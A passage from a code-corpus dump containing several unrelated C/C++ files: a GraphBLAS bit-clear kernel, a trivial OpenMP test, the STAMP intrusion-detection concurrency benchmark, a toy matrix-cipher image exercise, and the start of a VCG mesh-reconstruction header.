#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_BCLR || GxB_NO_UINT32 || GxB_NO_BCLR_UINT32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__bclr_uint32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type uint32_t
uint32_t bwork = (*((uint32_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *restrict Cx = (uint32_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *restrict Cx = (uint32_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__bclr_uint32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__bclr_uint32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__bclr_uint32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__bclr_uint32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t *Cx = (uint32_t *) Cx_output ;
uint32_t x = (*((uint32_t *) x_input)) ;
uint32_t *Bx = (uint32_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
uint32_t bij = GBX (Bx, p, false) ;
Cx [p] = GB_BITCLR (x, bij, uint32_t, 32) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__bclr_uint32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
uint32_t *Cx = (uint32_t *) Cx_output ;
uint32_t *Ax = (uint32_t *) Ax_input ;
uint32_t y = (*((uint32_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
uint32_t aij = GBX (Ax, p, false) ;
Cx [p] = GB_BITCLR (aij, y, uint32_t, 32) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
uint32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = GB_BITCLR (x, aij, uint32_t, 32) ; \
}
GrB_Info GB (_bind1st_tran__bclr_uint32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
uint32_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t x = (*((const uint32_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
uint32_t
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
uint32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = GB_BITCLR (aij, y, uint32_t, 32) ; \
}
GrB_Info GB (_bind2nd_tran__bclr_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
uint32_t y = (*((const uint32_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
ParallelBeginLink.c | int main() {
#pragma omp parallel
{
}
}
|
intruder.c | /* =============================================================================
*
* intruder.c
*
* =============================================================================
*
* Copyright (C) Stanford University, 2006. All Rights Reserved.
* Author: Chi Cao Minh
*
* =============================================================================
*
* For the license of bayes/sort.h and bayes/sort.c, please see the header
* of the files.
*
* ------------------------------------------------------------------------
*
* For the license of kmeans, please see kmeans/LICENSE.kmeans
*
* ------------------------------------------------------------------------
*
* For the license of ssca2, please see ssca2/COPYRIGHT
*
* ------------------------------------------------------------------------
*
* For the license of lib/mt19937ar.c and lib/mt19937ar.h, please see the
* header of the files.
*
* ------------------------------------------------------------------------
*
* For the license of lib/rbtree.h and lib/rbtree.c, please see
* lib/LEGALNOTICE.rbtree and lib/LICENSE.rbtree
*
* ------------------------------------------------------------------------
*
* Unless otherwise noted, the following license applies to STAMP files:
*
* Copyright (c) 2007, Stanford University
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Stanford University nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY STANFORD UNIVERSITY ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL STANFORD UNIVERSITY BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
* THE POSSIBILITY OF SUCH DAMAGE.
*
* =============================================================================
*/
#include <assert.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include "decoder.h"
#include "detector.h"
#include "dictionary.h"
#include "packet.h"
#include "stream.h"
#include "thread.h"
#include "timer.h"
#include "tm.h"
enum param_types {
PARAM_ATTACK = (unsigned char)'a',
PARAM_LENGTH = (unsigned char)'l',
PARAM_NUM = (unsigned char)'n',
PARAM_SEED = (unsigned char)'s',
PARAM_THREAD = (unsigned char)'t',
};
enum param_defaults {
PARAM_DEFAULT_ATTACK = 10,
PARAM_DEFAULT_LENGTH = 16,
PARAM_DEFAULT_NUM = 1 << 20,
PARAM_DEFAULT_SEED = 1,
PARAM_DEFAULT_THREAD = 1,
};
long global_params[256] = { /* 256 = ascii limit */
[PARAM_ATTACK] = PARAM_DEFAULT_ATTACK,
[PARAM_LENGTH] = PARAM_DEFAULT_LENGTH,
[PARAM_NUM] = PARAM_DEFAULT_NUM,
[PARAM_SEED] = PARAM_DEFAULT_SEED,
[PARAM_THREAD] = PARAM_DEFAULT_THREAD,
};
typedef struct arg {
/* input: */
stream_t* streamPtr;
decoder_t* decoderPtr;
/* output: */
vector_t** errorVectors;
} arg_t;
/* =============================================================================
* displayUsage
* =============================================================================
*/
static void
displayUsage (const char* appName)
{
printf("Usage: %s [options]\n", appName);
puts("\nOptions: (defaults)\n");
printf(" a <UINT> Percent [a]ttack (%i)\n", PARAM_DEFAULT_ATTACK);
printf(" l <UINT> Max data [l]ength (%i)\n", PARAM_DEFAULT_LENGTH);
printf(" n <UINT> [n]umber of flows (%i)\n", PARAM_DEFAULT_NUM);
printf(" s <UINT> Random [s]eed (%i)\n", PARAM_DEFAULT_SEED);
printf(" t <UINT> Number of [t]hreads (%i)\n", PARAM_DEFAULT_THREAD);
exit(1);
}
/* =============================================================================
* parseArgs
* =============================================================================
*/
static void
parseArgs (long argc, char* const argv[])
{
long i;
long opt;
opterr = 0;
while ((opt = getopt(argc, argv, "a:l:n:s:t:")) != -1) {
switch (opt) {
case 'a':
case 'l':
case 'n':
case 's':
case 't':
global_params[(unsigned char)opt] = atol(optarg);
break;
case '?':
default:
opterr++;
break;
}
}
for (i = optind; i < argc; i++) {
fprintf(stderr, "Non-option argument: %s\n", argv[i]);
opterr++;
}
if (opterr) {
displayUsage(argv[0]);
}
}
/* =============================================================================
* processPackets
* =============================================================================
*/
void
processPackets (void* argPtr)
{
TM_THREAD_ENTER();
long threadId = thread_getId();
stream_t* streamPtr = ((arg_t*)argPtr)->streamPtr;
decoder_t* decoderPtr = ((arg_t*)argPtr)->decoderPtr;
vector_t** errorVectors = ((arg_t*)argPtr)->errorVectors;
detector_t* detectorPtr = PDETECTOR_ALLOC();
assert(detectorPtr);
PDETECTOR_ADDPREPROCESSOR(detectorPtr, &preprocessor_toLower);
vector_t* errorVectorPtr = errorVectors[threadId];
while (1) {
char* bytes;
TM_BEGIN();
bytes = TMSTREAM_GETPACKET(streamPtr);
TM_END();
if (!bytes) {
break;
}
packet_t* packetPtr = (packet_t*)bytes;
long flowId = packetPtr->flowId;
error_t error;
TM_BEGIN();
error = TMDECODER_PROCESS(decoderPtr,
bytes,
(PACKET_HEADER_LENGTH + packetPtr->length));
TM_END();
if (error) {
/*
* Currently, stream_generate() does not create these errors.
*/
assert(0);
bool_t status = PVECTOR_PUSHBACK(errorVectorPtr, (void*)flowId);
assert(status);
}
char* data;
long decodedFlowId;
TM_BEGIN();
data = TMDECODER_GETCOMPLETE(decoderPtr, &decodedFlowId);
TM_END();
if (data) {
error_t error = PDETECTOR_PROCESS(detectorPtr, data);
P_FREE(data);
if (error) {
bool_t status = PVECTOR_PUSHBACK(errorVectorPtr,
(void*)decodedFlowId);
assert(status);
}
}
}
PDETECTOR_FREE(detectorPtr);
TM_THREAD_EXIT();
}
/* =============================================================================
* main
* =============================================================================
*/
MAIN(argc, argv)
{
char exitmsg[1024];
GOTO_REAL();
load_syncchar_map("sync_char.map.intruder");
/*
* Initialization
*/
parseArgs(argc, (char** const)argv);
sprintf(exitmsg, "END BENCHMARK %s-parallel-phase\n", argv[0]);
long numThread = global_params[PARAM_THREAD];
SIM_GET_NUM_CPU(numThread);
TM_STARTUP(numThread);
P_MEMORY_STARTUP(numThread);
thread_startup(numThread);
long percentAttack = global_params[PARAM_ATTACK];
long maxDataLength = global_params[PARAM_LENGTH];
long numFlow = global_params[PARAM_NUM];
long randomSeed = global_params[PARAM_SEED];
printf("Percent attack = %li\n", percentAttack);
printf("Max data length = %li\n", maxDataLength);
printf("Num flow = %li\n", numFlow);
printf("Random seed = %li\n", randomSeed);
dictionary_t* dictionaryPtr = dictionary_alloc();
assert(dictionaryPtr);
stream_t* streamPtr = stream_alloc(percentAttack);
assert(streamPtr);
long numAttack = stream_generate(streamPtr,
dictionaryPtr,
numFlow,
randomSeed,
maxDataLength);
printf("Num attack = %li\n", numAttack);
decoder_t* decoderPtr = decoder_alloc();
assert(decoderPtr);
vector_t** errorVectors = (vector_t**)malloc(numThread * sizeof(vector_t*));
assert(errorVectors);
long i;
for (i = 0; i < numThread; i++) {
vector_t* errorVectorPtr = vector_alloc(numFlow);
assert(errorVectorPtr);
errorVectors[i] = errorVectorPtr;
}
arg_t arg;
arg.streamPtr = streamPtr;
arg.decoderPtr = decoderPtr;
arg.errorVectors = errorVectors;
/*
* Run transactions
*/
TIMER_T startTime;
TIMER_READ(startTime);
OSA_PRINT("entering parallel phase\n",0);
START_INSTRUMENTATION();
GOTO_SIM();
#ifdef OTM
#pragma omp parallel
{
processPackets((void*)&arg);
}
#else
thread_start(processPackets, (void*)&arg);
#endif
GOTO_REAL();
OSA_PRINT("exiting parallel phase\n",0);
OSA_PRINT(exitmsg,0);
STOP_INSTRUMENTATION();;
TIMER_T stopTime;
TIMER_READ(stopTime);
printf("Elapsed time = %f seconds\n", TIMER_DIFF_SECONDS(startTime, stopTime));
/*
* Check solution
*/
long numFound = 0;
for (i = 0; i < numThread; i++) {
vector_t* errorVectorPtr = errorVectors[i];
long e;
long numError = vector_getSize(errorVectorPtr);
numFound += numError;
for (e = 0; e < numError; e++) {
long flowId = (long)vector_at(errorVectorPtr, e);
bool_t status = stream_isAttack(streamPtr, flowId);
assert(status);
}
}
printf("Num found = %li\n", numFound);
assert(numFound == numAttack);
/*
* Clean up
*/
for (i = 0; i < numThread; i++) {
vector_free(errorVectors[i]);
}
free(errorVectors);
decoder_free(decoderPtr);
stream_free(streamPtr);
dictionary_free(dictionaryPtr);
TM_SHUTDOWN();
P_MEMORY_SHUTDOWN();
GOTO_SIM();
thread_shutdown();
MAIN_RETURN(0);
}
/* =============================================================================
*
* End of intruder.c
*
* =============================================================================
*/
|
encrypt.c | /************************************************************************************
File: encrypt.c
Generates the encrypted page
***********************************************************************************/
#include "pixmap.h"
#include <omp.h>
void encrypt (unsigned char *v1, unsigned char *v2)
{
//////////////////////////////////////////////////////////////////////////////////////
/* TO COMPLETE: code to calculate the encryption */
//////////////////////////////////////////////////////////////////////////////////////
int enc_m[2][2] = {{21, 35},{18, 79}};
int n1 = (enc_m[0][0] * *v1 + enc_m[0][1] * *v2) % 256;
int n2 = (enc_m[1][0] * *v1 + enc_m[1][1] * *v2) % 256;
*v1 = n1;
*v2 = n2;
}
void generate_encrypted_page(page in_page, page *out_page)
{
generate_page(out_page,in_page.h,in_page.w,BLACK);
//////////////////////////////////////////////////////////////////////////////////////
/* TO COMPLETE: code to generate the encrypted page*/
//////////////////////////////////////////////////////////////////////////////////////
int n = (in_page.h*in_page.w);
#pragma omp parallel for schedule(guided)
for(int i = 0; i < n-1; i+=2) {
out_page->dat[i] = in_page.dat[i];
out_page->dat[i+1] = in_page.dat[i+1];
encrypt(&out_page->dat[i], &out_page->dat[i+1]);
}
}
|
uni_plymc_write.h | /*
* plymc.h
* filter_plymc
*
* Created by Paolo Cignoni on 10/23/09.
* Copyright 2009 ISTI - CNR. All rights reserved.
*
*/
#ifndef __PLYMC_H__
#define __PLYMC_H__
#ifndef WIN32
#define _int64 long long
#define __int64 long long
#define __cdecl
#endif
#include <cstdio>
#include <time.h>
#include <float.h>
#include <math.h>
#include <locale>
#include <iostream>
//#include <tchar.h>
#include <list>
#include <limits>
#include <vcg/space/index/grid_static_ptr.h>
#include <vcg/simplex/vertex/base.h>
#include <vcg/simplex/face/base.h>
#include <vcg/complex/used_types.h>
#include <vcg/complex/complex.h>
#include <vcg/complex/algorithms/update/position.h>
#include <vcg/complex/algorithms/update/normal.h>
#include <vcg/complex/algorithms/update/quality.h>
#include <vcg/complex/algorithms/update/edges.h>
#include <vcg/complex/algorithms/update/topology.h>
#include <vcg/complex/algorithms/update/flag.h>
#include <vcg/complex/algorithms/update/bounding.h>
#include <vcg/math/histogram.h>
#include <vcg/complex/algorithms/clean.h>
#include <wrap/io_trimesh/import.h>
#include <wrap/io_trimesh/export_ply.h>
#include <wrap/ply/plystuff.h>
#include <vcg/complex/algorithms/create/marching_cubes.h>
#include <vcg/complex/algorithms/create/extended_marching_cubes.h>
#include "trivial_walker.h"
// local optimization
#include <vcg/complex/algorithms/local_optimization.h>
#include <vcg/complex/algorithms/local_optimization/tri_edge_collapse.h>
#include <vcg/complex/algorithms/local_optimization/tri_edge_collapse_quadric.h>
#include <vcg/simplex/edge/base.h>
#include <stdarg.h>
#include "volume.h"
#include "tri_edge_collapse_mc.h"
#include <osg/Timer>
typedef bool CallBackPosTotal(const int pos, const int total,unsigned long long tick,const char * str );
namespace vcg {
namespace tri {
// Simple prototype for later use...
template<class MeshType>
void MCSimplify( MeshType &m, float perc, bool preserveBB=true, vcg::CallBackPos *cb=0);
template < class SMesh, class MeshProvider>
class PlyMC
{
public:
class MCVertex;
class MCEdge;
class MCFace;
class MCUsedTypes: public vcg::UsedTypes <vcg::Use<MCVertex>::template AsVertexType,
vcg::Use<MCEdge >::template AsEdgeType,
vcg::Use<MCFace >::template AsFaceType >{};
class MCVertex : public Vertex< MCUsedTypes, vertex::Coord3f, vertex::Color4b, vertex::Mark, vertex::VFAdj, vertex::BitFlags, vertex::Qualityf>{};
class MCEdge : public Edge<MCUsedTypes,edge::VertexRef> {
public:
inline MCEdge() {};
inline MCEdge( MCVertex * v0, MCVertex * v1){this->V(0) = v0; this->V(1) = v1; };
static inline MCEdge OrderedEdge(MCVertex* v0,MCVertex* v1){
if(v0<v1) return MCEdge(v0,v1);
else return MCEdge(v1,v0);
}
};
class MCFace : public Face< MCUsedTypes, face::InfoOcf, face::VertexRef, face::FFAdjOcf, face::VFAdjOcf, face::BitFlags> {};
class MCMesh : public vcg::tri::TriMesh< std::vector< MCVertex>, face::vector_ocf< MCFace > > {};
//******************************************
//typedef Voxel<float> Voxelf;
typedef Voxelfc Voxelf;
//******************************************
class Parameter
{
public:
Parameter()
{
NCell=10000;
WideNum= 3;
WideSize=0;
VoxSize=0;
IPosS=Point3i(0,0,0); // SubVolume Start
IPosE=Point3i(0,0,0); // SubVolume End
IPosB=Point3i(0,0,0); // SubVolume to restart from in lexicographic order (useful for crashes)
//IPos=Point3i(0,0,0);
IDiv=Point3i(1,1,1);
VerboseLevel=0;
SliceNum=1;
FillThr=12;
ExpAngleDeg=30;
SmoothNum=1;
RefillNum=1;
IntraSmoothFlag = false;
QualitySmoothAbs = 0.0f; // 0 means un-setted value.
QualitySmoothVox = 3.0f; // expressed in voxel
OffsetFlag=false;
OffsetThr=-3;
GeodesicQualityFlag=true;
PLYFileQualityFlag=false;
SaveVolumeFlag=false;
SafeBorder=1;
CleaningFlag=false;
SimplificationFlag=false;
VertSplatFlag=false;
MergeColor=false;
basename = "plymcout";
}
int NCell;
int WideNum;
float WideSize;
float VoxSize;
Point3i IPosS; // SubVolume Start
Point3i IPosE; // SubVolume End
Point3i IPosB; // SubVolume to restart from in lexicographic order (useful for crashes)
//Point3i IPos;
Point3i IDiv;
int VerboseLevel;
int SliceNum;
int FillThr;
float ExpAngleDeg;
int SmoothNum;
int RefillNum;
bool IntraSmoothFlag;
float QualitySmoothAbs; // 0 means un-setted value.
float QualitySmoothVox; // expressed in voxel
bool OffsetFlag;
float OffsetThr;
bool GeodesicQualityFlag;
bool PLYFileQualityFlag;
bool SaveVolumeFlag;
int SafeBorder;
bool CleaningFlag;
bool SimplificationFlag;
bool VertSplatFlag;
bool MergeColor;
std::string basename;
std::vector<std::string> OutNameVec;
std::vector<std::string> OutNameSimpVec;
}; //end Parameter class
/// PLYMC Data
MeshProvider MP;
Parameter p;
// std::vector< std::vector<std::vector<Volume<Voxelf> > > >vVV;
/// PLYMC Methods
bool InitMesh(Volume<Voxelf> &VV,SMesh &m, const char *filename, Matrix44f Tr)
{
typename SMesh::VertexIterator vi;
int loadmask;
int ret = tri::io::Importer<SMesh>::Open(m,filename,loadmask);
tri::Clean<SMesh>::FlipMesh(m);
if(ret)
{
printf("Error: unabe to open mesh '%s'",filename);
return false;
}
if(p.VertSplatFlag)
{
if(!(loadmask & tri::io::Mask::IOM_VERTNORMAL))
{
printf("Error, pointset MUST have normals");
exit(-1);
}
else printf("Ok Pointset has normals\n");
for(vi=m.vert.begin(); vi!=m.vert.end();++vi)
if(math::Abs(SquaredNorm((*vi).N())-1.0)>0.0001)
{
printf("Error: mesh has not per vertex normalized normals\n");
return false;
}
if(!(loadmask & tri::io::Mask::IOM_VERTQUALITY))
tri::UpdateQuality<SMesh>::VertexConstant(m,0);
tri::UpdateNormals<SMesh>::PerVertexMatrix(m,Tr);
//if(!(loadmask & tri::io::Mask::IOM_VERTCOLOR))
// saveMask &= ~tri::io::Mask::IOM_VERTCOLOR;
}
else // processing for triangle meshes
{
if(p.CleaningFlag){
int dup = tri::Clean<SMesh>::RemoveDuplicateVertex(m);
int unref = tri::Clean<SMesh>::RemoveUnreferencedVertex(m);
printf("Removed %i duplicates and %i unref",dup,unref);
}
tri::UpdateNormals<SMesh>::PerVertexNormalizedPerFaceNormalized(m);
if(p.GeodesicQualityFlag) {
tri::UpdateTopology<SMesh>::VertexFace(m);
tri::UpdateFlags<SMesh>::FaceBorderFromVF(m);
tri::UpdateQuality<SMesh>::VertexGeodesicFromBorder(m);
}
}
tri::UpdatePosition<SMesh>::Matrix(m,Tr,false);
tri::UpdateBounding<SMesh>::Box(m);
//printf("Init Mesh %s (%ivn,%ifn)\n",filename,m.vn,m.fn);
for(vi=m.vert.begin(); vi!=m.vert.end();++vi)
VV.Interize((*vi).P());
return true;
}
// This function add a mesh (or a point cloud to the volume)
// the point cloud MUST have normalized vertex normals.
bool AddMeshToVolumeM(Volume<Voxelf> &VV,SMesh &m, std::string meshname, const double w )
{
typename SMesh::VertexIterator vi;
typename SMesh::FaceIterator fi;
if(!m.bbox.Collide(VV.SubBoxSafe)) return false;
size_t found =meshname.find_last_of("/\\");
std::string shortname = meshname.substr(found+1);
Volume <Voxelf> B;
B.Init(VV);
bool res=false;
double quality=0;
// Now add the mesh to the volume
if(!p.VertSplatFlag)
{
float minq=std::numeric_limits<float>::max(), maxq=-std::numeric_limits<float>::max();
// Calcolo range qualita geodesica PER FACCIA come media di quelle per vertice
for(fi=m.face.begin(); fi!=m.face.end();++fi){
(*fi).Q()=((*fi).V(0)->Q()+(*fi).V(1)->Q()+(*fi).V(2)->Q())/3.0f;
minq=std::min((*fi).Q(),minq);
maxq=std::max((*fi).Q(),maxq);
}
// La qualita' e' inizialmente espressa come distanza assoluta dal bordo della mesh
//printf("Q [%4.2f %4.2f] \n",minq,maxq);
bool closed=false;
if(minq==maxq) closed=true; // se la mesh e' chiusa la ComputeGeodesicQuality mette la qualita a zero ovunque
// Classical approach: scan each face
int tt0=clock();
//printf("---- Face Rasterization");
for(fi=m.face.begin(); fi!=m.face.end();++fi)
{
if(closed || (p.PLYFileQualityFlag==false && p.GeodesicQualityFlag==false)) quality=1.0;
else quality=w*(*fi).Q();
if(quality)
res |= B.ScanFace((*fi).V(0)->P(),(*fi).V(1)->P(),(*fi).V(2)->P(),quality,(*fi).N());
}
//printf("herer\n");
// printf(" : %li\n",clock()-tt0);
} else
{ // Splat approach add only the vertices to the volume
printf("Vertex Splatting\n");
for(vi=m.vert.begin();vi!=m.vert.end();++vi)
{
if(p.PLYFileQualityFlag==false) quality=1.0;
else quality=w*(*vi).Q();
if(quality)
res |= B.SplatVert((*vi).P(),quality,(*vi).N(),(*vi).C());
}
}
if(!res) return false;
int vstp=0;
if(p.VerboseLevel>0) {
B.SlicedPPM(shortname.c_str(),std::string(SFormat("%02i",vstp)).c_str(),p.SliceNum );
B.SlicedPPMQ(shortname.c_str(),std::string(SFormat("%02i",vstp)).c_str(),p.SliceNum );
vstp++;
}
for(int i=0;i<p.WideNum;++i) {
B.Expand(math::ToRad(p.ExpAngleDeg));
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02ie",vstp++),p.SliceNum );
B.Refill(p.FillThr);
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02if",vstp++),p.SliceNum );
if(p.IntraSmoothFlag)
{
Volume <Voxelf> SM;
SM.Init(VV);
SM.CopySmooth(B,1,p.QualitySmoothAbs);
B=SM;
